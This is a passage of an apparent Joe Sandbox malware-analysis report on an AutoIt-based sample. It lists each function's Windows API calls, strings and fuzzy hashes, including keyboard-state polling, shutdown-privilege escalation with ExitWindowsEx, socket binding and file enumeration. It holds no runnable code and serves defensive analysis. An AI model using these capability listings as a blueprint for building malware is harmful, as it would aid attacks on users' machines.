GetAsyncKeyState.USER32(0000005B), ref: 005FA6A9
GetKeyState.USER32(0000005B), ref: 005FA6BB

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: ada0ec1f720ab95a73cebccba20b36cbff8b2d0d1acf25e41aedc4d593135f39
Instruction ID: 54a8746655b4091760ec259134779e8219ad1e3d7acbd322d20701576052f4a1
Opcode Fuzzy Hash: ada0ec1f720ab95a73cebccba20b36cbff8b2d0d1acf25e41aedc4d593135f39
Instruction Fuzzy Hash: B54195B49047CD6EFF31576084143B5BEA17F15344F088059DBCA9A5C2DBEC99C48B53

Uniqueness

Uniqueness Score: -1.00%

Function 00614089 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 006140D1
CoUninitialize.OLE32 ref: 006140DC
CoCreateInstance.OLE32(?,00000000,00000017,00630B44,?), ref: 00614136
IIDFromString.OLE32(?,?), ref: 006141A9
VariantInit.OLEAUT32(?), ref: 00614241
VariantClear.OLEAUT32(?), ref: 00614293

Strings

Invalid parameter, xrefs: 006141C2
NULL Pointer assignment, xrefs: 0061417B
Failed to create object, xrefs: 00614141, 006141F7

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: ff2357208eaf67ebead46359dd52e9a87e312ff1d9aed6a1a391a44841a46114
Instruction ID: 305148e42f4df663179cabc876bc8323d2b55301fccaaa2e7cccad6048ff435f
Opcode Fuzzy Hash: ff2357208eaf67ebead46359dd52e9a87e312ff1d9aed6a1a391a44841a46114
Instruction Fuzzy Hash: FB61A171204701AFD710DF64D849BAABBEAFF89754F080409F9819B291DB70EDC9CB92

Uniqueness

Uniqueness Score: -1.00%

Function 005FF122 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 005F1F53: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005F1F9D
Part of subcall function 005F1F53: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005F1FCA
Part of subcall function 005F1F53: GetLastError.KERNEL32 ref: 005F1FDA

ExitWindowsEx.USER32(?,00000000), ref: 005FF15E

Strings

, xrefs: 005FF188
SeShutdownPrivilege, xrefs: 005FF12E
@, xrefs: 005FF151
, xrefs: 005FF14C

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 9f5e02107faff94d2fc69db14c86aa71884c8fe9eb578438bc9660a1fc32e38e
Instruction ID: 4ec96522da405164ef9b4b2d7f7167dbff96eb9fb0f200870d8923b4b5b6f05d
Opcode Fuzzy Hash: 9f5e02107faff94d2fc69db14c86aa71884c8fe9eb578438bc9660a1fc32e38e
Instruction Fuzzy Hash: 8A01D672610219EBE73426B8EC89FBF7A6DBF08390F150831FF02E20D1D6684D04C2A0

Uniqueness

Uniqueness Score: -1.00%

Function 0060A488 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0060A4D5
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0060A5E8

Part of subcall function 006041CE: GetInputState.USER32 ref: 00604225
Part of subcall function 006041CE: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006042C0

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0060A505
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0060A5D2

Strings

*.*, xrefs: 0060A4BA

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 823f2416cec37c71a0f2091a8da64b6146f6d36256cd07d84185d60162eccb6d
Instruction ID: f613bb9d8c87ac212451abed9fe8e5f4cdcbb781015f34a61550e57f56edb62a
Opcode Fuzzy Hash: 823f2416cec37c71a0f2091a8da64b6146f6d36256cd07d84185d60162eccb6d
Instruction Fuzzy Hash: 5A417D7194030AAFDF19DFA4DD49AEEBBB6FF15350F204056E805A22D1E7309E45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0059225D Relevance: 7.8, APIs: 5, Instructions: 309COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 005922EE
GetSysColor.USER32(0000000F), ref: 005923C3
SetBkColor.GDI32(?,00000000), ref: 005923D6

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Color$Proc
String ID:
API String ID: 929743424-0
Opcode ID: 70675cca19b9fa6d4ad6d4768bff491bc7fd112a096d54fdbca3223c34327a63
Instruction ID: 4e806a1c0edd31d9050e5360056198c5aec30af18df8f8e3f6aedcbfd0aac1c2
Opcode Fuzzy Hash: 70675cca19b9fa6d4ad6d4768bff491bc7fd112a096d54fdbca3223c34327a63
Instruction Fuzzy Hash: F581F6B0205854BAEF396A3D9C58EBF2D5EFB82300F19091BF142C5795CA598F01D677

Uniqueness

Uniqueness Score: -1.00%

Function 00612163 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 006139AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 006139D7
Part of subcall function 006139AB: _wcslen.LIBCMT ref: 006139F8

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 006121BA
WSAGetLastError.WSOCK32 ref: 006121E1
bind.WSOCK32(00000000,?,00000010), ref: 00612238
WSAGetLastError.WSOCK32 ref: 00612243
closesocket.WSOCK32(00000000), ref: 00612272

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 2de1fc207542226516f84af3bf7058b6b246d8f21faa9d42ddff75ea9713b496
Instruction ID: e872a668d802c955d0d121fb24b5966dace7537111a62fd5e007ab7ba955ce6f
Opcode Fuzzy Hash: 2de1fc207542226516f84af3bf7058b6b246d8f21faa9d42ddff75ea9713b496
Instruction Fuzzy Hash: 2451D375A00601AFDB10EF24C89AF6E7BE5AB45714F088048F9159F3D3CA70ED42CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 006225A0 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 0062261F
IsWindowEnabled.USER32 ref: 0062262D
GetForegroundWindow.USER32(?,?,00000001,?), ref: 0062263A
IsIconic.USER32 ref: 00622648
IsZoomed.USER32 ref: 00622656

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 428c56ec2fff859493abd6ad56d515ea4fbbd72ef4bb463abcb7e54d4dfb5ede
Instruction ID: a4c25027c87325eecca95a7c4347d630fc602a915fb1b0da13bc4008a82ec53a
Opcode Fuzzy Hash: 428c56ec2fff859493abd6ad56d515ea4fbbd72ef4bb463abcb7e54d4dfb5ede
Instruction Fuzzy Hash: FE21D631300A62AFD7209F15E864B967B96EF95314F188068E8499B352DB75DD42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 005FEBE5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 005FEC19

Strings

DOWN, xrefs: 005FEBFE

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: e7ab29a0b453ac90f176cd2b5c4befe0b9e47c76e2d0447c3de080ff19b61b5d
Instruction ID: 1c97b43429d9e8fb5c24e0e6f61871a8f69705a463b4d21e4347b781c8b019ea
Opcode Fuzzy Hash: e7ab29a0b453ac90f176cd2b5c4befe0b9e47c76e2d0447c3de080ff19b61b5d
Instruction Fuzzy Hash: 19E08C2629DB363CBA1421187C07DFA078CAF6A775B620246FD00E52D1ED882D8664A9

Uniqueness

Uniqueness Score: -1.00%

Function 005EE5F8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 005EE60A

Strings

X64, xrefs: 005EE626

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: df4ea934196d825b8e67f0111901185207141c1ab4d61ea93c6787642480da55
Instruction ID: aa0c6195f7b94dae5d3f0fc5c78ccf2d248b6b6fa2c974f2bf5a2a69b23ee0bc
Opcode Fuzzy Hash: df4ea934196d825b8e67f0111901185207141c1ab4d61ea93c6787642480da55
Instruction Fuzzy Hash: E4D0C9B481111DEACFA0CF90EC88DDD777CBB08304F100551F106A2000D77095498B20

Uniqueness

Uniqueness Score: -1.00%

Function 0061306E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0061309B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 006131C7
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00613206
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00613216
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0061325D
GetClientRect.USER32(00000000,?), ref: 00613269
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 006132B2
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006132C1
GetStockObject.GDI32(00000011), ref: 006132D1
SelectObject.GDI32(00000000,00000000), ref: 006132D5
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 006132E5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 006132EE
DeleteDC.GDI32(00000000), ref: 006132F7
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00613323
SendMessageW.USER32(00000030,00000000,00000001), ref: 0061333A
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0061337A
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0061338E
SendMessageW.USER32(00000404,00000001,00000000), ref: 0061339F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 006133D4
GetStockObject.GDI32(00000011), ref: 006133DF
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 006133EA
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 006133F4

Strings

static, xrefs: 006132AC, 006133CE
AutoIt v3, xrefs: 00613255
DISPLAY, xrefs: 006132B7
msctls_progress32, xrefs: 00613370

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: bcfbdaa70297ced3d332c75e027337eb1d49c8831e2d979a4c4a3cdf4f6ab3ba
Instruction ID: 89fffc1b167d8730ccfab4cd39dde6ec9d91a1e33a3abdf583032e68df400b73
Opcode Fuzzy Hash: bcfbdaa70297ced3d332c75e027337eb1d49c8831e2d979a4c4a3cdf4f6ab3ba
Instruction Fuzzy Hash: AAB14CB1A00615AFEB24DF68DC4AFAE7BBAFB44710F144114F915E7290C7B4AD41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00620BA0 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00620C44
_wcslen.LIBCMT ref: 00620C7E
_wcslen.LIBCMT ref: 00620CE8
_wcslen.LIBCMT ref: 00620D50
_wcslen.LIBCMT ref: 00620DD4
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00620E24
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00620E63

Part of subcall function 005AFD60: _wcslen.LIBCMT ref: 005AFD6B

Part of subcall function 005F2ACF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 005F2AE8
Part of subcall function 005F2ACF: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 005F2B1A

Strings

SELECT, xrefs: 00620EA7
SELECTCLEAR, xrefs: 00620E8C
ISSELECTED, xrefs: 00620E3C
GETITEMCOUNT, xrefs: 00620C75, 00620C96
DESELECT, xrefs: 00620EFB
GETSUBITEMCOUNT, xrefs: 00620CE3, 00620CFE
GETSELECTED, xrefs: 00620F40
VIEWCHANGE, xrefs: 00620FD4
GETSELECTEDCOUNT, xrefs: 00620DCF, 00620DEA
GETTEXT, xrefs: 00620D4B, 00620D66
FINDITEM, xrefs: 00620F86
SELECTINVERT, xrefs: 00620EDD
SELECTALL, xrefs: 00620E74

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: e3a73df1418e549dbd6ce967eea3c0bf93d26696b8d20b8a1922773425499403
Instruction ID: 3b4245a582120442eafa7a1bc4fc21ffb2fa541323bc71e2edee5d83e8618a70
Opcode Fuzzy Hash: e3a73df1418e549dbd6ce967eea3c0bf93d26696b8d20b8a1922773425499403
Instruction Fuzzy Hash: 06E1DF31208A128FDB24DF24D5418AABBE6FFD9314B14495CF8969B7A2DB30ED46CB41

Uniqueness

Uniqueness Score: -1.00%

Function 005924C3 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0059259A
GetSystemMetrics.USER32(00000007), ref: 005925A2
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005925CD
GetSystemMetrics.USER32(00000008), ref: 005925D5
GetSystemMetrics.USER32(00000004), ref: 005925FA
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00592617
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00592627
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0059265A
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0059266E
GetClientRect.USER32(00000000,000000FF), ref: 0059268C
GetStockObject.GDI32(00000011), ref: 005926A8
SendMessageW.USER32(00000000,00000030,00000000), ref: 005926B3

Part of subcall function 005919CD: GetCursorPos.USER32(?), ref: 005919E1
Part of subcall function 005919CD: ScreenToClient.USER32(00000000,?), ref: 005919FE
Part of subcall function 005919CD: GetAsyncKeyState.USER32(00000001), ref: 00591A23
Part of subcall function 005919CD: GetAsyncKeyState.USER32(00000002), ref: 00591A3D

SetTimer.USER32(00000000,00000000,00000028,0059199C), ref: 005926DA

Strings

AutoIt v3 GUI, xrefs: 00592652

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: b3846c73bcaa45ac4c05c8151ea96c445596b570e5aaa4d2a8e819b928a73cb0
Instruction ID: 68328b81e25ad6b15b29575b6e398c4b8331e4eb05e13fe321e5a9016477ac05
Opcode Fuzzy Hash: b3846c73bcaa45ac4c05c8151ea96c445596b570e5aaa4d2a8e819b928a73cb0
Instruction Fuzzy Hash: 9BB18E7160060AAFDF24DFA8CC59BAD3BB6FB88314F11421AFA15AB290D774D941CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00628C9B Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00628CB9
_wcslen.LIBCMT ref: 00628CCD
_wcslen.LIBCMT ref: 00628CF0
_wcslen.LIBCMT ref: 00628D13
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00628D51
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00626551), ref: 00628DAD
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00628DE6
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00628E29
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00628E60
FreeLibrary.KERNEL32(?), ref: 00628E6C
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00628E7C
DestroyIcon.USER32(?,?,?,?,?,00626551), ref: 00628E8B
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00628EA8
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00628EB4

Strings

Qeb, xrefs: 00628CA4, 00628EBA, 00628D64, 00628E3B, 00628DC2
.icl, xrefs: 00628CC7
.exe, xrefs: 00628CE7
.dll, xrefs: 00628D0A

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl$Qeb
API String ID: 799131459-3805208156
Opcode ID: 2d6155b46fcec5544f19ea0862d103e0f32f6947cd46347b559d16e400c7ad8f
Instruction ID: 09800ef0814fa1dd9911dd91a4eea3b8ffb9925004700b20545ac190b836c4ae
Opcode Fuzzy Hash: 2d6155b46fcec5544f19ea0862d103e0f32f6947cd46347b559d16e400c7ad8f
Instruction Fuzzy Hash: 4861EF71500A25BEEB24DB64DC46BFE7BA9BF08710F108506F815D71D1DBB4AD45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0062127D Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00621325
_wcslen.LIBCMT ref: 00621360
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006213B3
_wcslen.LIBCMT ref: 006213E9
_wcslen.LIBCMT ref: 00621465
_wcslen.LIBCMT ref: 006214E0

Part of subcall function 005AFD60: _wcslen.LIBCMT ref: 005AFD6B

Part of subcall function 005F3478: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005F348A

Strings

SELECT, xrefs: 00621670
CHECK, xrefs: 006213E4, 006213FF
GETSELECTED, xrefs: 006215AD
EXPAND, xrefs: 00621557
EXISTS, xrefs: 006214DB, 006214F6
COLLAPSE, xrefs: 00621460, 0062147B
GETTEXT, xrefs: 006215F6
UNCHECK, xrefs: 0062169D
GETITEMCOUNT, xrefs: 0062157D
ISCHECKED, xrefs: 00621640
GETTOTALCOUNT, xrefs: 00621351, 00621376

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
